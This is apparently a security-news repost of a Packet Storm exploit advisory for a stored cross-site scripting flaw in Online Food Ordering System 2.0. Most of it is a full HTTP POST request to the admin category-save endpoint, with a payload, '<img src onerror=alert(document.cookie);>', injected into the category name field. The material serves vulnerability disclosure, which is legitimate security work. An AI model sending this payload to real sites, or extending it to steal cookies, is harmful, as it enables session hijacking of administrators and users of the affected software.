Security
Headlines
HeadlinesLatestCVEs

Headline

Online Food Ordering System 2.0 Cross Site Scripting

Online Food Ordering System version 2.0 suffers from a cross site scripting vulnerability.

Packet Storm
#sql#xss#vulnerability#mac#intel#php#auth#firefox
# Exploit Title: Online Food Ordering System v2 - Stored Cross Site Scripting (XSS)# Date: 01/11/2023# Exploit Author: Alaeddin Berksoy# Vendor Homepage: https://www.sourcecodester.com/php/16022/online-food-ordering-system-v2-using-php8-and-mysql-free-source-code.html# Software Link: https://www.sourcecodester.com/download-code?nid=16022&title=Online+Food+Ordering+System+v2+using+PHP8+and+MySQL+Free+Source+Code# Version: 2.0 # Tested on: Macos / XAMPPPOST /fos/admin/ajax.php?action=save_category HTTP/1.1Host: localhostUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:108.0) Gecko/20100101 Firefox/108.0Accept: */*Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------212007370016574149261512413130Content-Length: 322Origin: http://localhostConnection: closeReferer: http://localhost/fos/admin/index.php?page=categoriesCookie: language=en; welcomebanner_status=dismiss; continueCode=LoPJXWEAqruytmUYHrT4FDiBZikOH1Vh8Zh7JHvLtppI9VCvXHEYd7ywQ1B5; cookieconsent_status=dismiss; PHPSESSID=eje1menuonpvjtfbl2ri965btkSec-Fetch-Dest: emptySec-Fetch-Mode: corsSec-Fetch-Site: same-origin-----------------------------212007370016574149261512413130Content-Disposition: form-data; name="id"-----------------------------212007370016574149261512413130Content-Disposition: form-data; name="name"<img src onerror=alert(document.cookie);>-----------------------------212007370016574149261512413130--

Packet Storm: Latest News

Acronis Cyber Protect/Backup Remote Code Execution